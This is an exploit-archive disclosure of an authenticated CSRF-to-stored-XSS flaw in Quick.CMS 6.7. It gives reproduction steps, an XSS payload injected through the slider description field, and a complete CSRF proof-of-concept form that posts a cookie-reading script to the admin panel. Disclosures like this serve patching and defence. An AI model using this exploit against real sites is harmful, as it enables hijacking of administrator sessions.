Quick.CMS 6.7 Cross Site Request Forgery / Cross Site Scripting

2021.11.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Quick.CMS 6.7 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated) # Date: 2021-04-21 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://opensolution.org/ # Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip # Version: 6.7 # Tested on: Windows 8.1, Kali Linux, Burp Suite Steps to Reproduce: Steps to Reproduce: 1. At first login your panel 2. then click the "Sliders" menu to "New Slider" 3. now intercept with the burp suite and save a new slider 4. Then use XSS payload </textarea><script>alert(document.domain)</script> in sDescription value. 5. Now Generate a CSRF POC <!DOCTYPE html> <html> <body> <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST"> <input type="hidden" name="iSlider" value=""> <input type="hidden" name="aFile" filename=""> <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg"> <input type="hidden" name="sDescription" value="test</textarea><script>alert(document.cookie)</script>"> <input type="hidden" name="iPosition" value="1"> <input type="hidden" name="sOption" value="save"> <input type="submit" value="submit"> </form> </body> </html>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top